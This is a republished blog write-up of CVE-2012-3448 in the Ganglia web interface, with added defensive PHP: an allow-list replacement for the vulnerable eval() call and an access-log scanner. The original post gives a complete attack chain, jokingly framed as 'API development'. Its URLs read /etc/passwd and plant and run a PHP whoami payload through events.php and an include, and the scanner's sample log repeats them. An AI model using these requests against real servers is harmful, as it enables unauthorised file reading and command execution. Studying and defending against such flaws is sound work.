http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html
I recently grabbed the latest version of the Ganglia web application to take a look at whether this issue has been fixed, and I was pleasantly surprised... GitHub is over here -
https://github.com/ganglia/ganglia-web
Looking at the code, the following (abbreviated) sequence from "graph.php" can be found -
```php
$graph = isset($_GET["g"]) ? sanitize ( $_GET["g"] ) : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');
```
I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers; unfortunately it is slightly broken. For some reason, when this API was being developed, part of its interface was wrapped in the following function -
```php
function sanitize ( $string ) {
    return escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}
```
According to the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.
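The escaping above is aimed at a shell, but the string ends up in eval(), so the real fix is to never build code from the request at all. The following is an added example, not Ganglia's own code, of an allow-list parser and dispatcher that replaces the eval() call; the report names, argument keys and renderer function names are assumptions made for illustration.

```php
<?php
// Added example, not Ganglia's code: allow-list parsing in place of the eval()
// dispatch from graph.php quoted above. Report names, argument keys and the
// renderer function names are assumptions made for illustration.

// Report name -> renderer function. Fixed in source, never built from input.
const GRAPH_FUNCTIONS = ['cpu_report' => 'graph_cpu_report', 'load_report' => 'graph_load_report'];

// Optional "key=value" arguments and the exact values each may take.
const GRAPH_ARG_VALUES = [
    'size'  => ['small', 'medium', 'large'],
    'range' => ['hour', 'day', 'week', 'month', 'year'],
];

// Parse "g=<report>[,<key>=<value>...]" without eval(). Anything not on the
// allow-lists rejects the whole request, so no request text is ever treated
// as code; only a renderer *name* and a validated array come out.
function parse_graph_request(string $g): ?array {
    $parts  = explode(',', $g);
    $report = array_shift($parts);
    if (!isset(GRAPH_FUNCTIONS[$report])) {
        return null;                                   // unknown report
    }
    $args = [];
    foreach ($parts as $part) {
        if (substr_count($part, '=') !== 1) {
            return null;                               // e.g. "include '/etc/passwd'"
        }
        [$key, $value] = explode('=', $part, 2);
        if (!isset(GRAPH_ARG_VALUES[$key]) || !in_array($value, GRAPH_ARG_VALUES[$key], true)) {
            return null;                               // unknown key or value
        }
        $args[$key] = $value;
    }
    return [GRAPH_FUNCTIONS[$report], $args];
}

// The request may choose *which* renderer runs, never *what* code runs.
function render_graph(string $g, array $rrdtool_graph): ?array {
    $parsed = parse_graph_request($g);
    if ($parsed === null) {
        http_response_code(400);                       // reject, do not "sanitize"
        return null;
    }
    [$function, $args] = $parsed;
    return call_user_func($function, $rrdtool_graph, $args);
}
```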
This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP language constructs that do not require "(" or ")"; a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) suggests that "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'
Very helpful: we can get a nice report with a list of current system users. Reporting like this is a nice feature, but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application, it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows a Ganglia user to configure events in the system; I am not exactly sure what type of events you would configure, but I hope that I am invited.
As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=
This request will set up an "event" that will let everyone know who you are; that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location, "/var/lib/ganglia/conf/events.json", let's go ahead and include this file in our API call -
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'
As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.
Update: This issue has been assigned CVE-2012-3448
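From the defender's side, each step of the chain above leaves a distinctive request in the web server access log. The following is an added example, not from the original post or the Ganglia project, that flags those request shapes over constructed log lines; the paths /gang/graph.php and /gang/api/events.php are taken from the post's example URLs.

```php
<?php
// Added example, not from the original post or the Ganglia project: scan
// access log lines for the two request shapes described above. The log
// lines are constructed; the paths come from the post's example URLs.

const SAMPLE_ACCESS_LOG = <<<'LOG'
10.0.0.5 - - [15/Jan/2012:10:01:02 +0000] "GET /gang/graph.php?g=cpu_report&z=medium HTTP/1.1" 200 5120
10.0.0.9 - - [15/Jan/2012:10:03:17 +0000] "GET /gang/graph.php?g=cpu_report,include+'/etc/passwd' HTTP/1.1" 200 2210
10.0.0.9 - - [15/Jan/2012:10:04:44 +0000] "GET /gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00 HTTP/1.1" 200 40
10.0.0.9 - - [15/Jan/2012:10:05:01 +0000] "GET /gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json' HTTP/1.1" 200 90
LOG;

// Returns one [line_number, reason] pair per suspicious request.
function find_ganglia_abuse(string $log): array {
    $findings = [];
    foreach (explode("\n", $log) as $i => $line) {
        if (!preg_match('/"(?:GET|POST) (\S+) HTTP\//', $line, $m)) {
            continue;
        }
        $path = parse_url($m[1], PHP_URL_PATH) ?: '';
        parse_str(parse_url($m[1], PHP_URL_QUERY) ?: '', $params);   // decodes %xx and '+'

        // graph.php: everything after the first comma in "g" reaches eval(),
        // so flag any argument text that is not a plain key=value token.
        if (preg_match('~/graph\.php$~', $path) && isset($params['g'])) {
            $comma = strpos($params['g'], ',');
            if ($comma !== false) {
                $args = substr($params['g'], $comma + 1);
                if (preg_match('/[^A-Za-z0-9_=,]/', $args)) {
                    $findings[] = [$i + 1, 'graph.php g= carries non-trivial eval() input: ' . $args];
                }
            }
        }
        // events.php: a summary holding a PHP open tag is written to events.json,
        // which the graph.php include trick can then pull in.
        if (preg_match('~/events\.php$~', $path) && isset($params['summary'])
            && stripos($params['summary'], '<?') !== false) {
            $findings[] = [$i + 1, 'events.php summary contains a PHP open tag'];
        }
    }
    return $findings;
}

print_r(find_ganglia_abuse(SAMPLE_ACCESS_LOG));
```

A first request against graph.php with a bare report name and query parameters is left alone; the check only fires on the comma-separated argument part, which is the only text that reaches eval().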